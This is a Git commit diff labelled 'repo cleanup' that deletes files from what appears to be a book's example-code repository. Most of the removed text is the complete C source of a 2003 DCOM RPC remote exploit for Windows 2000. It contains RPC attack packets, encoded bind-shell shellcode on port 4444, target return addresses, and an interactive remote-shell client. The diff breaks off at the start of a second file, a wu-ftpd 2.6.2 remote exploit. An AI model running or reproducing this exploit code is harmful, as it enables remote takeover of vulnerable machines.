repo cleanup

3388c197 · Dan Fauxsmith · 8c67185a · 8c67185a · 3388c197 · 8c67185a
Commit 3388c197 authored May 08, 2018 by Dan Fauxsmith
20 changed files
--- a/9780596006112
+++ b/9780596006112
-9780596006112
\ No newline at end of file
--- a/code/example-code.zip
+++ b/code/example-code.zip
--- a/tools/0x82-dcomrpc_usemgret.c
+++ b/tools/0x82-dcomrpc_usemgret.c
-/*
-**
-** 2003/07/27 - DCOM RPC WIN32 remote exploit (Most languages)
-**
-** FlashSky/Benjurry and, H D Moore's code is very excellent.
-** It works well even if change only return address.
-** I didn't feel necessity for new make.
-**
-** Thankful to them.
-**
-** 2003/07/30 - Update, Added magic return address.
-**
-** kokanin supplied very excellent information:
-** URL: http://lists.netsys.com/pipermail/full-disclosure/2003-July/012000.html
-**
-** * As well as Korean thanks to, a lot of systems can exploit.
-**
-** --
-** Thank you.
-**
-** P.S: Sorry, for my poor english.
-**
-** --
-** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
-** My World: http://x82.i21c.net & http://x82.inetcop.org
-*/
-
-#include <stdio.h>
-#include <unistd.h>
-#include <stdlib.h>
-#include <netdb.h>
-#include <netinet/in.h>
-#include <sys/socket.h>
-
-u_char bindstr[]={
-	0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,
-	0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
-	0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,
-	0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
-	0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
-	0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
-	0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,
-	0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
-	0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00
-};
-u_char request1[]={
-	0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,
-	0xE8,0x03,0x00,0x00,0xE5,0x00,0x00,0x00,
-	0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,
-	0x05,0x00,0x06,0x00,0x01,0x00,0x00,0x00,
-	0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,
-	0xCC,0x45,0x64,0x49,0xB0,0x70,0xDD,0xAE,
-	0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,
-	0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
-	0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,
-	0x7C,0x5E,0x0D,0x00,0x00,0x00,0x00,0x00,
-	0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,
-	0x2A,0x4D,0xCE,0x11,0xA6,0x6A,0x00,0x20,
-	0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,
-	0x4D,0x41,0x52,0x42,0x01,0x00,0x00,0x00,
-	0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,
-	0x00,0x00,0x00,0x00,0xA8,0xF4,0x0B,0x00,
-	0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,
-	0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,
-	0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
-	0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
-	0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,
-	0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
-	0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,
-	0x28,0x03,0x00,0x00,0x00,0x00,0x00,0x00,
-	0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
-	0xC8,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,
-	0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,
-	0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,
-	0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
-	0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
-	0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,
-	0x64,0x29,0xCD,0x00,0x00,0x00,0x00,0x00,
-	0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,
-	0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
-	0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,
-	0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
-	0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,
-	0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
-	0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,
-	0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
-	0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,
-	0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
-	0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,
-	0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
-	0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,
-	0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
-	0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,
-	0x60,0x00,0x00,0x00,0x58,0x00,0x00,0x00,
-	0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,
-	0x20,0x00,0x00,0x00,0x78,0x00,0x00,0x00,
-	0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
-	0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
-	0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,
-	0xFF,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,
-	0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
-	0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
-	0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
-	0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
-	0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
-	0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
-	0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
-	0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
-	0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
-	0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
-	0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,
-	0x06,0x09,0x02,0x00,0x00,0x00,0x00,0x00,
-	0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
-	0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
-	0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
-	0x00,0x00,0x00,0x00,0x78,0x19,0x0C,0x00,
-	0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,
-	0x01,0x00,0x00,0x00,0x70,0xD8,0x98,0x93,
-	0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,
-	0xB2,0x00,0x00,0x00,0x32,0x00,0x31,0x00,
-	0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
-	0x80,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,
-	0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
-	0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
-	0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,
-	0x60,0x00,0x00,0x00,0x60,0x00,0x00,0x00,
-	0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,
-	0xC0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
-	0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
-	0x3B,0x03,0x00,0x00,0x00,0x00,0x00,0x00,
-	0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
-	0x00,0x00,0x00,0x00,0x30,0x00,0x00,0x00,
-	0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,
-	0x80,0x0E,0xE9,0x4A,0x99,0x99,0xF1,0x8A,
-	0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,
-	0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
-	0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
-	0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
-	0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
-	0x30,0x00,0x00,0x00,0x78,0x00,0x6E,0x00,
-	0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,
-	0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
-	0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,
-	0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,
-	0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,
-	0x46,0x00,0x58,0x00,0x00,0x00,0x00,0x00,
-	0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
-	0x10,0x00,0x00,0x00,0x30,0x00,0x2E,0x00,
-	0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
-	0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
-	0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
-	0x68,0x00,0x00,0x00,0x0E,0x00,0xFF,0xFF,
-	0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,
-	0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
-};
-u_char request2[]=
-{
-	0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
-	0x20,0x00,0x00,0x00,0x5C,0x00,0x5C,0x00
-};
-u_char request3[]=
-{
-	0x5C,0x00,0x43,0x00,0x24,0x00,0x5C,0x00,
-	0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,
-	0x35,0x00,0x36,0x00,0x31,0x00,0x31,0x00,
-	0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,
-	0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,
-	0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,
-	0x31,0x00,0x2E,0x00,0x64,0x00,0x6F,0x00,
-	0x63,0x00,0x00,0x00
-};
-u_char request4[]=
-{
-	0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
-	0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,
-	0x00,0x00,0x00,0x00,0x88,0x2A,0x0C,0x00,
-	0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
-	0x28,0x8C,0x0C,0x00,0x01,0x00,0x00,0x00,
-	0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
-};
-u_char shellcode[]=
-{
-	/* port 4444 bind shellcode */
-	0x46,0x00,0x58,0x00,0x4e,0x00,0x42,0x00,
-	0x46,0x00,0x58,0x00,0x46,0x00,0x58,0x00,
-	0x4e,0x00,0x42,0x00,0x46,0x00,0x58,0x00,
-	0x46,0x00,0x58,0x00,0x46,0x00,0x58,0x00,
-	0x46,0x00,0x58,0x00,0xff,0xff,0xff,0xff,
-	0xcc,0xe0,0xfd,0x7f,0xcc,0xe0,0xfd,0x7f,
-	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
-	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
-	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
-	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
-	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
-	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
-	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
-	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
-	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
-	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
-	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
-	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
-	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
-	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
-	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
-	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
-	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
-	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
-	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
-	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
-	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xeb,
-	0x19,0x5e,0x31,0xc9,0x81,0xe9,0x89,0xff,
-	0xff,0xff,0x81,0x36,0x80,0xbf,0x32,0x94,
-	0x81,0xee,0xfc,0xff,0xff,0xff,0xe2,0xf2,
-	0xeb,0x05,0xe8,0xe2,0xff,0xff,0xff,0x03,
-	0x53,0x06,0x1f,0x74,0x57,0x75,0x95,0x80,
-	0xbf,0xbb,0x92,0x7f,0x89,0x5a,0x1a,0xce,
-	0xb1,0xde,0x7c,0xe1,0xbe,0x32,0x94,0x09,
-	0xf9,0x3a,0x6b,0xb6,0xd7,0x9f,0x4d,0x85,
-	0x71,0xda,0xc6,0x81,0xbf,0x32,0x1d,0xc6,
-	0xb3,0x5a,0xf8,0xec,0xbf,0x32,0xfc,0xb3,
-	0x8d,0x1c,0xf0,0xe8,0xc8,0x41,0xa6,0xdf,
-	0xeb,0xcd,0xc2,0x88,0x36,0x74,0x90,0x7f,
-	0x89,0x5a,0xe6,0x7e,0x0c,0x24,0x7c,0xad,
-	0xbe,0x32,0x94,0x09,0xf9,0x22,0x6b,0xb6,
-	0xd7,0x4c,0x4c,0x62,0xcc,0xda,0x8a,0x81,
-	0xbf,0x32,0x1d,0xc6,0xab,0xcd,0xe2,0x84,
-	0xd7,0xf9,0x79,0x7c,0x84,0xda,0x9a,0x81,
-	0xbf,0x32,0x1d,0xc6,0xa7,0xcd,0xe2,0x84,
-	0xd7,0xeb,0x9d,0x75,0x12,0xda,0x6a,0x80,
-	0xbf,0x32,0x1d,0xc6,0xa3,0xcd,0xe2,0x84,
-	0xd7,0x96,0x8e,0xf0,0x78,0xda,0x7a,0x80,
-	0xbf,0x32,0x1d,0xc6,0x9f,0xcd,0xe2,0x84,
-	0xd7,0x96,0x39,0xae,0x56,0xda,0x4a,0x80,
-	0xbf,0x32,0x1d,0xc6,0x9b,0xcd,0xe2,0x84,
-	0xd7,0xd7,0xdd,0x06,0xf6,0xda,0x5a,0x80,
-	0xbf,0x32,0x1d,0xc6,0x97,0xcd,0xe2,0x84,
-	0xd7,0xd5,0xed,0x46,0xc6,0xda,0x2a,0x80,
-	0xbf,0x32,0x1d,0xc6,0x93,0x01,0x6b,0x01,
-	0x53,0xa2,0x95,0x80,0xbf,0x66,0xfc,0x81,
-	0xbe,0x32,0x94,0x7f,0xe9,0x2a,0xc4,0xd0,
-	0xef,0x62,0xd4,0xd0,0xff,0x62,0x6b,0xd6,
-	0xa3,0xb9,0x4c,0xd7,0xe8,0x5a,0x96,0x80,
-	0xae,0x6e,0x1f,0x4c,0xd5,0x24,0xc5,0xd3,
-	0x40,0x64,0xb4,0xd7,0xec,0xcd,0xc2,0xa4,
-	0xe8,0x63,0xc7,0x7f,0xe9,0x1a,0x1f,0x50,
-	0xd7,0x57,0xec,0xe5,0xbf,0x5a,0xf7,0xed,
-	0xdb,0x1c,0x1d,0xe6,0x8f,0xb1,0x78,0xd4,
-	0x32,0x0e,0xb0,0xb3,0x7f,0x01,0x5d,0x03,
-	0x7e,0x27,0x3f,0x62,0x42,0xf4,0xd0,0xa4,
-	0xaf,0x76,0x6a,0xc4,0x9b,0x0f,0x1d,0xd4,
-	0x9b,0x7a,0x1d,0xd4,0x9b,0x7e,0x1d,0xd4,
-	0x9b,0x62,0x19,0xc4,0x9b,0x22,0xc0,0xd0,
-	0xee,0x63,0xc5,0xea,0xbe,0x63,0xc5,0x7f,
-	0xc9,0x02,0xc5,0x7f,0xe9,0x22,0x1f,0x4c,
-	0xd5,0xcd,0x6b,0xb1,0x40,0x64,0x98,0x0b,
-	0x77,0x65,0x6b,0xd6,0x93,0xcd,0xc2,0x94,
-	0xea,0x64,0xf0,0x21,0x8f,0x32,0x94,0x80,
-	0x3a,0xf2,0xec,0x8c,0x34,0x72,0x98,0x0b,
-	0xcf,0x2e,0x39,0x0b,0xd7,0x3a,0x7f,0x89,
-	0x34,0x72,0xa0,0x0b,0x17,0x8a,0x94,0x80,
-	0xbf,0xb9,0x51,0xde,0xe2,0xf0,0x90,0x80,
-	0xec,0x67,0xc2,0xd7,0x34,0x5e,0xb0,0x98,
-	0x34,0x77,0xa8,0x0b,0xeb,0x37,0xec,0x83,
-	0x6a,0xb9,0xde,0x98,0x34,0x68,0xb4,0x83,
-	0x62,0xd1,0xa6,0xc9,0x34,0x06,0x1f,0x83,
-	0x4a,0x01,0x6b,0x7c,0x8c,0xf2,0x38,0xba,
-	0x7b,0x46,0x93,0x41,0x70,0x3f,0x97,0x78,
-	0x54,0xc0,0xaf,0xfc,0x9b,0x26,0xe1,0x61,
-	0x34,0x68,0xb0,0x83,0x62,0x54,0x1f,0x8c,
-	0xf4,0xb9,0xce,0x9c,0xbc,0xef,0x1f,0x84,
-	0x34,0x31,0x51,0x6b,0xbd,0x01,0x54,0x0b,
-	0x6a,0x6d,0xca,0xdd,0xe4,0xf0,0x90,0x80,
-	0x2f,0xa2,0x04,0x00
-};
-
-struct os_plat_pk
-{
-	int op_pk_num;
-	char *op_pk_str;
-	u_long retloc_jmp_esp;
-};
-struct os_plat_pk __pt_pkg_form[]=
-{
-	{0,"Windows 2000 magic version 1",0x0018759F},
-	{1,"Windows 2000 magic version 2",0x001875E3},
-	{2,"Windows 2000 magic version 3",0x001F0CD0},
-	{3,"Windows 2000 magic version 4",0x010016C6},
-	{4,"Windows 2000 magic version 5",0x010016CB},
-	{0x82,NULL,0}
-};
-
-#define DEF_STR "It's test"
-#define DEF_BF (0x1000)
-#define DEF_SZ (0xff)
-#define GET_SZ (0x400)
-
-int sexsock(char *conn_host_nm,int conn_port_nm);
-void start_shell(int st_sock_va);
-void re_connt_lm(int st_sock_va);
-void pri_usg(char *f_nm);
-void pri_banrl();
-
-int main(int argc, char *argv[])
-{
-	int sock,type_def=(0),r_r1,r_r2,whgl;
-	u_long retloc_jmp_esp=(__pt_pkg_form[type_def].retloc_jmp_esp);
-	u_char get_bf[(DEF_BF)],atk_bf[(DEF_BF)];
-	char def_host[(DEF_SZ)]=(DEF_STR);
-
-	(void)pri_banrl();
-	while((whgl=getopt(argc,argv,"T:t:H:h:Ii"))!=EOF)
-	{
-		switch(whgl)
-		{
-			case 'T':
-			case 't':
-				if((type_def=atoi(optarg))>4)
-				{
-					(void)pri_usg(argv[0]);
-				}
-				else retloc_jmp_esp=(__pt_pkg_form[type_def].retloc_jmp_esp);
-				break;
-
-			case 'H':
-			case 'h':
-				memset((char *)def_host,0,sizeof(def_host));
-				strncpy(def_host,optarg,sizeof(def_host)-1);
-				break;
-
-			case 'I':
-			case 'i':
-				(void)pri_usg(argv[0]);
-				break;
-
-			case '?':
-				(void)pri_usg(argv[0]);
-				break;
-		}
-	}
-	if(strstr(def_host,(DEF_STR)))
-	{
-		(void)pri_usg(argv[0]);
-	}
-	fprintf(stdout," [*] Target: %s.\n",__pt_pkg_form[type_def].op_pk_str);
-	
-	fprintf(stdout," [0] Add return address.\n");
-	memcpy((u_char *)shellcode+36,(u_char *)&retloc_jmp_esp,4);
-	fprintf(stdout," [1] Start, shellcode setting.\n");
-	memcpy((u_char *)atk_bf,request1,sizeof(request1));
-	r_r1=sizeof(request1);
-	r_r2=sizeof(shellcode)/2;
-
-#define QIK_SHIFT(v,x,l) *(u_long *)(v+x)=*(u_long *)(v+x)+l
-
-	QIK_SHIFT(request2,0,r_r2);
-	QIK_SHIFT(request2,8,r_r2);
-
-	memcpy((u_char *)atk_bf+r_r1,request2,sizeof(request2));
-	r_r1+=sizeof(request2);
-	memcpy((u_char *)atk_bf+r_r1,shellcode,sizeof(shellcode));
-	r_r1+=sizeof(shellcode);
-	memcpy((u_char *)atk_bf+r_r1,request3,sizeof(request3));
-	r_r1+=sizeof(request3);
-	memcpy((u_char *)atk_bf+r_r1,request4,sizeof(request4));
-	r_r1+=sizeof(request4);
-	r_r2=sizeof(shellcode)-12;
-
-	QIK_SHIFT(atk_bf,8,r_r2);
-	QIK_SHIFT(atk_bf,16,r_r2);
-	QIK_SHIFT(atk_bf,128,r_r2);
-	QIK_SHIFT(atk_bf,132,r_r2);
-	QIK_SHIFT(atk_bf,180,r_r2);
-	QIK_SHIFT(atk_bf,184,r_r2);
-	QIK_SHIFT(atk_bf,208,r_r2);
-	QIK_SHIFT(atk_bf,396,r_r2);
-
-	fprintf(stdout," [2] Trying %s:135 ...\n",def_host);
-	sock=(int)sexsock(def_host,(135));
-	(void)re_connt_lm(sock);
-	
-	fprintf(stdout," [3] Connected to %s:135.\n",def_host);
-	send(sock,bindstr,sizeof(bindstr),0);
-	recv(sock,get_bf,sizeof(get_bf),0);
-	
-	fprintf(stdout," [4] Send, attack code.\n");
-	send(sock,atk_bf,r_r1,0);
-	close(sock);
-	
-	fprintf(stdout," [5] OK, Trying %s:4444 ...\n",def_host);
-	fprintf(stdout," [*] Waiting, cmd shell ");
-	fflush(stdout);
-	sleep(1);
-	
-	fprintf(stdout,".");
-	fflush(stdout);
-	sleep(1);
-	
-	fprintf(stdout,".");
-	fflush(stdout);
-	sleep(1);
-	
-	fprintf(stdout,".\n");
-	sock=(int)sexsock(def_host,(4444));
-	(void)re_connt_lm(sock);
-	(void)start_shell(sock);
-
-	exit(0);
-}
-
-int sexsock(char *conn_host_nm,int conn_port_nm)
-{
-	int sock;
-	struct hostent *sxp;
-	struct sockaddr_in sxp_addr;
- 
-	if((sxp=gethostbyname(conn_host_nm))==NULL)
-	{
-		herror(" [-] gethostbyname() error");
-		return(-1);
-	}
-	if((sock=socket(AF_INET,SOCK_STREAM,0))==-1)
-	{
-		perror(" [-] socket() error");
-		return(-1);
-	}
-	sxp_addr.sin_family=AF_INET;
-	sxp_addr.sin_port=htons(conn_port_nm);
-	sxp_addr.sin_addr=*((struct in_addr*)sxp->h_addr);
-	bzero(&(sxp_addr.sin_zero),8);
-
-	if(connect(sock,(struct sockaddr *)&sxp_addr,sizeof(struct sockaddr))==-1)
-	{
-		perror(" [-] connect() error");
-		return(-1);
-	}
-	return(sock);
-}
-
-void start_shell(int st_sock_va)
-{
-	int died;
-	char *command="cd C:\\ & echo Wow, are u hacker now ?!\n";
-	char readbuf[(GET_SZ)];
-	fd_set rset;
-	memset((char *)readbuf,0,sizeof(readbuf));
-	fprintf(stdout," [!] Executed shell successfully !\n\n");
-	send(st_sock_va,command,strlen(command),0);
-
-	for(;;)
-	{
-		fflush(stdout);
-		FD_ZERO(&rset);
-		FD_SET(st_sock_va,&rset);
-		FD_SET(STDIN_FILENO,&rset);
-		select(st_sock_va+1,&rset,NULL,NULL,NULL);
-
-		if(FD_ISSET(st_sock_va,&rset))
-		{
-			died=read(st_sock_va,readbuf,sizeof(readbuf)-1);
-			if(died<=0)
-				exit(0);
-			readbuf[died]=0;
-			fprintf(stdout,"%s",readbuf);
-		}
-		if(FD_ISSET(STDIN_FILENO,&rset))
-		{
-			died=read(STDIN_FILENO,readbuf,sizeof(readbuf)-1);
-			if(died>0)
-			{
-				readbuf[died]=0;
-				write(st_sock_va,readbuf,died);
-			}
-		}
-	}
-	return;
-}
-
-void re_connt_lm(int st_sock_va)
-{
-	if(st_sock_va==-1)
-	{
-		fprintf(stdout," [-] Failed.\n\n");
-		fprintf(stdout," Happy Exploit ! :-)\n\n");
-		exit(-1);
-	}
-}
-
-void pri_usg(char *f_nm)
-{
-	int r_rn=0;
-	fprintf(stdout," Usage: %s -option [argument]\n\n",f_nm);
-	fprintf(stdout,"\t -h [hostname] - target host.\n");
-	fprintf(stdout,"\t -t [number]   - select target number.\n\n");
-	fprintf(stdout," Select target number>\n\n");
-	for(;;)
-	{
-		if(__pt_pkg_form[r_rn].op_pk_num==(0x82))
-			break;
-		else
-		{
-			fprintf(stdout,"\t {%d} %s\n",__pt_pkg_form[r_rn].op_pk_num,__pt_pkg_form[r_rn].op_pk_str);
-		}
-		r_rn++;
-	}
-	fprintf(stdout,"\n Exmaple> %s -h korea.microsoft.com -t3\n\n",f_nm);
-	exit(0);
-}
-
-void pri_banrl()
-{
-	fprintf(stdout,"\n DCOM RPC WIN32 remote exploit (Most languages)\n\n");
-}
-
-/* eox */
-
--- a/tools/0x82-wu262.c
+++ b/tools/0x82-wu262.c
-/*
-**
-** wu-ftpd v2.6.2 off-by-one remote 0day exploit.
-** Public version - 2003/08/02
-**
-** --
-** This vulnerability was discovered by Wojciech Purczynski <cliph@isec.pl>,
-** Janusz Niewiadomski <funkysh@isec.pl>.
-** They offered excellent Advisory, I'm thankful to them.
-**
-** URL: http://isec.pl/vulnerabilities/isec-0011-wu-ftpd.txt
-**
-** --
-** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
-** My World: http://x82.inetcop.org
-*/
-/*
-** -=-= POINT! POINT! POINT! POINT! POINT! =-=-
-**
-** More useful version isn't going to share. (various test version)
-** For reference, exploit method that use `STOR' command succeeded. :-)
-**
-** Update: August 2, I added wu-ftpd-2.6.2, 2.6.0, 2.6.1 finally.
-**         August 3, Brute-Force function addition.
-** --
-** Thank you.
-**
-*/
-
-#define VERSION "v0.0.3"
-#include <stdio.h>
-#include <unistd.h>
-#include <stdlib.h>
-#include <netdb.h>
-#include <netinet/in.h>
-#include <sys/socket.h>
-
-#define DEBUG_NG
-#undef DEBUG_NG
-#define NRL 0
-#define SCS 1
-#define FAD (-1)
-#define MAX_BF (16)
-#define BF_LSZ (0x100) /* 256 */
-#define DEF_VA 255
-#define DEF_PORT 21
-#define DEF_ANSH 11
-#define GET_HOST_NM_ERR (NULL)
-#define SIN_ZR_SIZE 8
-#define DEF_ALIGN 4
-#define GET_R 5000
-#define DEF_NOP 64
-#define DEF_STR "x0x"
-#define HOME_DIR "/home/"